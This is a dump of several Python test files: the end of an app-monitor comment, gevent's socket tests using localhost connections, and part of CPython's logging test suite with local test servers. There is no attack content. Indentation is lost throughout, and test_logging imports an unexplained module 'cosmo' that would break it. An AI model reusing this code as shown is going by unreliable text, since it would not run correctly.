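# would be aggregated into summary['std']['aa:bb:cc']['Netflix'] with the Kbps values
# summed per (device, Meta) pair.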
#if __name__ == "__main__":
# app = AppMonitor()
# app.run()
|
test__socket.py
|
from gevent import monkey; monkey.patch_all()
import sys
import os
import array
import socket
import traceback
import time
import greentest
from functools import wraps
import _six as six
# we use threading on purpose so that we can test both regular and gevent sockets with the same code
from threading import Thread as _Thread
def wrap_error(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except:
traceback.print_exc()
os._exit(2)
return wrapper
class Thread(_Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
target = wrap_error(target)
_Thread.__init__(self, target=target, **kwargs)
self.start()
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if six.PY3:
long_data = long_data.encode('ascii')
def setUp(self):
greentest.TestCase.setUp(self)
listener = socket.socket()
greentest.bind_and_listen(listener, ('127.0.0.1', 0))
self.listener = listener
self.port = listener.getsockname()[1]
def cleanup(self):
if hasattr(self, 'listener'):
try:
self.listener.close()
except:
pass
del self.listener
def create_connection(self, host='127.0.0.1', port=None, timeout=None,
blocking=None):
sock = socket.socket()
sock.connect((host, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return self._close_on_teardown(sock)
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
read_data = []
server_exc_info = []
def accept_and_read():
try:
conn, _ = self.listener.accept()
r = conn.makefile(mode='rb')
read_data.append(r.read())
r.close()
conn.close()
except:
server_exc_info.append(sys.exc_info())
server = Thread(target=accept_and_read)
client = self.create_connection(**client_args)
try:
getattr(client, client_method)(data)
finally:
client.shutdown(socket.SHUT_RDWR)
client.close()
server.join()
if match_data is None:
match_data = self.long_data
self.assertEqual(read_data[0], match_data)
if server_exc_info:
six.reraise(*server_exc_info[0])
def test_sendall_str(self):
self._test_sendall(self.long_data)
if not six.PY3:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
(remote_client, _) = self.listener.accept()
# start reading, then, while reading, start writing. the reader should not hang forever
def sendall():
remote_client.sendall(b't' * N)
sender = Thread(target=sendall)
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
sender.join()
remote_client.close()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = client.makefile()
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
client.settimeout(1)
start = time.time()
self.assertRaises(self.TIMEOUT_ERROR, client.recv, 1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
acceptor.join()
client.close()
client_sock[0][0].close()
# On Windows send() accepts whatever is thrown at it
if sys.platform != 'win32':
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
_test_sendall_data = b'hello' * 1000000
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
self.assertRaises(self.TIMEOUT_ERROR, client.sendall, self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
assert 0.09 <= took <= 0.2, took
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, addr = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close() # for pypy
acceptor = Thread(target=accept_once)
client = self.create_connection()
fd = client.makefile(mode='rb')
client.close()
assert fd.readline() == b'hello\n'
assert fd.read() == b''
fd.close()
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, addr = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
        self.assertEqual(socket.AF_INET, s.family)
        self.assertEqual(socket.SOCK_DGRAM, s.type)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
            self.assertEqual(socket.SOCK_DGRAM, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
s.close()
def get_port():
tempsock = socket.socket()
tempsock.bind(('', 0))
port = tempsock.getsockname()[1]
tempsock.close()
return port
class TestCreateConnection(greentest.TestCase):
__timeout__ = 5
def test(self):
try:
socket.create_connection(('localhost', get_port()), timeout=30, source_address=('', get_port()))
except socket.error as ex:
if 'refused' not in str(ex).lower():
raise
else:
raise AssertionError('create_connection did not raise socket.error as expected')
class TestFunctions(greentest.TestCase):
def test_wait_timeout(self):
# Issue #635
import gevent.socket
import gevent._socketcommon
orig_get_hub = gevent.socket.get_hub
class get_hub(object):
def wait(self, io):
gevent.sleep(10)
class io(object):
callback = None
gevent._socketcommon.get_hub = get_hub
try:
try:
gevent.socket.wait(io(), timeout=0.01)
except gevent.socket.timeout:
pass
else:
self.fail("Should raise timeout error")
finally:
gevent._socketcommon.get_hub = orig_get_hub
# Creating new types in the function takes a cycle to cleanup.
test_wait_timeout.ignore_leakcheck = True
if __name__ == '__main__':
greentest.main()
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import cosmo
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import _thread
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
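# Illustrative sketch (not part of the original test suite): roughly how an
# application would register the custom level names above and log at one of
# them. The helper name is hypothetical and is never called by these tests.
def _example_use_custom_levels():
    for _level, _name in my_logging_levels.items():
        logging.addLevelName(_level, _name)
    logging.getLogger("example.chatty").log(VERBOSE, "spoken at the Verbose level")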
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
asyncore.close_all(map=self._map, ignore_all=True)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
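    # Illustrative sketch (not part of the original tests): a ControlMixin
    # server is driven by passing a plain callable as the handler and waiting
    # on ``ready`` before use. The helper below is hypothetical and is never
    # called by the test suite.
    def _example_control_mixin_usage(received):
        server = TestTCPServer(('localhost', 0), received.append, 0.01)
        server.start()
        server.ready.wait()
        port = server.port  # clients would connect to ('localhost', port)
        server.stop(2.0)
        return port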
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
_block_on_close = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
